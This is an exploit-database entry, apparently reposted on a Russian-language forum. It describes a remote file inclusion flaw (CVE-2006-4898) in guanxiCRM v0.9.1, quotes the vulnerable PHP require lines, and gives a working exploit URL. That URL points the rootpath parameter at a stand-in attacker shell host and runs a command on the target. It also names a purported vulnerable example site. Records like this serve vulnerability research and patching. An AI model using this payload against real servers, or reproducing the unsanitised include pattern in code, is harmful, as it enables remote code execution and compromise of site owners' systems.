- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2381
- Проверка EDB
-
- Пройдено
- Автор
- SHIKAA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4898
- Дата публикации
- 2006-09-16
Код:
#==============================================================================================
#guanxiCRM <= v0.9.1 (rootpath) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://sourceforge.net/projects/guanxicrm/
#
#Version : v0.9.1
#
#================================================================================================
#
#Example : http://www.nu3d.com/crm
#
#================================================================================================
#Bug in : include/phpxd/phpXD.php
#
#Vlu Code :
#--------------------------------
# $path = $appconf["rootpath"]. "/include/phpxd/";
#
# require($path."include/dom.php");
# require($path."include/dtd.php");
# require($path."include/parser.php");
# ?>
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/include/phpxd/phpXD.php?appconf[rootpath]=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & XoRoN & Saudi Hackerz
==================================================================================================
# milw0rm.com [2006-09-16]- Источник
- www.exploit-db.com
